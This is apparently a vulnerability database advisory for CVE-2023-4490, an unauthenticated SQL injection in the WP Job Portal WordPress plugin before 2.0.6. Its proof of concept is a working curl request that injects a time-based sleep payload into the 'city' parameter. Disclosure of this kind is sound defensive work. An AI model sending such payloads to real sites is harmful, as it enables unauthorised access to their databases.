WP Job Portal < 2.0.6 – Unauthenticated SQLi | CVE 2023-4490 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users

Proof of Concept

Setup (as admin): Create a dummy company and a job (if there are none)

Attack (as unauthenticated):
time curl -X POST --data 'jobtitle=a&city=(select*from(select(sleep(10)))a)&wpjobportallay=jobs&WPJOBPORTAL_form_search=WPJOBPORTAL_SEARCH' https://example.com/wp-job-portal-jobseeker-controlpanel/jobs/

and notice the 10s delay of the response

Affects Plugins

Fixed in 2.0.6

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Pablo Sanchez

Submitter

Pablo Sanchez

Verified

Yes

WPVDB ID

986024f0-3c8d-44d8-a9c9-1dd284d7db0d

Timeline

Publicly Published

2023-08-30 (about 2 years ago)

Added

2023-08-30 (about 2 years ago)

Last Updated

2023-10-18 (about 2 years ago)

Other

Published

Title

Published

2018-09-25

Title

Capability Manager Enhanced <= 1.5.8 - Authenticated SQLi

Published

2014-08-01

Title

ForumConverter - SQL Injection

Published

2025-04-03

Title

Product Filter by WBW < 2.8.0 - Unauthenticated SQL Injection via filtersDataBackend Parameter

Published

2014-08-01

Title

File Groups <= 1.1.2 - SQL Injection

Published

2025-01-24

Title

Premium Packages < 5.9.7 - Authenticated (Administrator+) SQL Injection